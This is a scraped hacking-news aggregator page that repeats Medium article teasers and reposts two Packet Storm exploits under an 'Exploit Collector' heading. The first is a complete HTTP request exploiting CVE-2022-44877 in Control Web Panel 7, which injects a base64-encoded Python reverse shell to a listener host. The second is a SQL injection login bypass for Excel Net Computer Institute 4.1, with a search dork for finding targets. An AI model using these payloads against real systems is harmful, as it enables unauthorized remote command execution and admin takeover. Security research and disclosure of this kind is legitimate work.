Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
ACTIVE DIRECTORY 201 — BREACHING A DOMAIN
https://cdn-images-1.medium.com/max/1920/1*l71OW5LpHX2bbxMLejE0ZA.png
Well done on setting up an Active Directory Lab.
Continue reading on Medium »
ACTIVE DIRECTORY 201 — BREACHING A DOMAIN
https://cdn-images-1.medium.com/max/1920/1*l71OW5LpHX2bbxMLejE0ZA.png
Well done on setting up an Active Directory Lab.
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
The Way To A Red Gathering Skillful Software Engineer
https://cdn-images-1.medium.com/max/2600/0*A6kiOXCSVjqGPxmi
Need to turn into a Red Gathering Capable Developer?
Continue reading on Medium »
The Way To A Red Gathering Skillful Software Engineer
https://cdn-images-1.medium.com/max/2600/0*A6kiOXCSVjqGPxmi
Need to turn into a Red Gathering Capable Developer?
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Top 30 Best Gifts For Software Engineers And Designers In 2023
https://cdn-images-1.medium.com/max/2600/0*ZVIO8dUtTGz6KzS_
What better gift for a software engineer or designer than something they can use in their work or leisure activity?
Continue reading on Medium »
Top 30 Best Gifts For Software Engineers And Designers In 2023
https://cdn-images-1.medium.com/max/2600/0*ZVIO8dUtTGz6KzS_
What better gift for a software engineer or designer than something they can use in their work or leisure activity?
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Pitfalls Of Upgradable Contracts| BlockAudit
https://cdn-images-1.medium.com/max/2315/1*3Z88Zvn3W-o0YfmQMbmvXw.png
Supporting the creation of upgradeable contracts is a common trend in smart contract architecture.
Continue reading on Medium »
Pitfalls Of Upgradable Contracts| BlockAudit
https://cdn-images-1.medium.com/max/2315/1*3Z88Zvn3W-o0YfmQMbmvXw.png
Supporting the creation of upgradeable contracts is a common trend in smart contract architecture.
Continue reading on Medium »
How I Found AWS API Keys using “Trufflehog” and Validated them using “enumerate-iam” tool
https://infosecwriteups.com/how-i-found-aws-api-keys-using-trufflehog-and-validated-them-using-enumerate-iam-tool-cd6ba7c86d09?source=rss------bug_bounty-5
https://infosecwriteups.com/how-i-found-aws-api-keys-using-trufflehog-and-validated-them-using-enumerate-iam-tool-cd6ba7c86d09?source=rss------bug_bounty-5
Hello Guys..!!Continue reading on InfoSec Write-ups » (https://infosecwriteups.com/how-i-found-aws-api-keys-using-trufflehog-and-validated-them-using-enumerate-iam-tool-cd6ba7c86d09?source=rss------bug_bounty-5)
Hacking Hackers for fun and profit
https://krevetk0.medium.com/hacking-hackers-for-fun-and-profit-784e6c7897e8?source=rss------bug_bounty-5
https://krevetk0.medium.com/hacking-hackers-for-fun-and-profit-784e6c7897e8?source=rss------bug_bounty-5
This story will be in several parts. In each of the situations, I had to face unexpected results.Continue reading on Medium » (https://krevetk0.medium.com/hacking-hackers-for-fun-and-profit-784e6c7897e8?source=rss------bug_bounty-5)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Control Web Panel 7 Remote Code Execution
https://4.bp.blogspot.com/-slZrAXCcTc4/WWlvSkUdx-I/AAAAAAAAINc/GD9pE2wpupUfP-XcYlxrz5jw2m91dZTOgCLcBGAs/s1600/h39.png
Control Web Panel 7 versions prior to 0.9.8.1147 suffer from an unauthenticated remote code execution vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
Control Web Panel 7 Remote Code Execution
https://4.bp.blogspot.com/-slZrAXCcTc4/WWlvSkUdx-I/AAAAAAAAINc/GD9pE2wpupUfP-XcYlxrz5jw2m91dZTOgCLcBGAs/s1600/h39.png
Control Web Panel 7 versions prior to 0.9.8.1147 suffer from an unauthenticated remote code execution vulnerability.
SHA-256 |
698ef6e35dc8ca09f1857de4c6b56f25be500ed741ecd49ee2cd7f5d8dbf30efDownload
[+] Centos Web Panel 7 Unauthenticated Remote Code Execution
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
[+] CVE: CVE-2022-44877
Description
--------------
Bash commands can be run because double quotes are used to log incorrect entries to the system.
Video Proof of Concept
--------------
https://www.youtube.com/watch?v=kiLfSvc1SYY
Proof of concept:
--------------
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close
username=root&password=toor&commit=Login
--------------
Solution
--------
Upgrade to CWP7 current version.
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Excel Net Computer Institute 4.1 SQL Injection
https://4.bp.blogspot.com/-our8kmhncnY/WWlvTk7Dk6I/AAAAAAAAINs/ofoeVvTLCzkScTt1I86TmBZptlym-DdFACLcBGAs/s1600/h42.png
Excel Net Computer Institute version 4.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
SHA-256 |
Download
Source:packetstormsecurity.com
Excel Net Computer Institute 4.1 SQL Injection
https://4.bp.blogspot.com/-our8kmhncnY/WWlvTk7Dk6I/AAAAAAAAINs/ofoeVvTLCzkScTt1I86TmBZptlym-DdFACLcBGAs/s1600/h42.png
Excel Net Computer Institute version 4.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
SHA-256 |
6e0d6656b5c808ef3fe50aec1bdf458a6173e6fc9e595d2d4c977a81377adba5Download
====================================================================================================================================
| # Title : Excel Net Computer Institute Version 4.1 SQL injection authentication bypass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : https://www.excelnet.org/ |
| # Dork : "photos_view.php?pid=" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use path (/new/) to access at admin panel & Full control of website .
[+] Use payload for login information = user & pass : 1' or 1=1 -- -
[+] https://127.0.0.1/excelnet.41org/new/lead_home.php
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================
Source:packetstormsecurity.com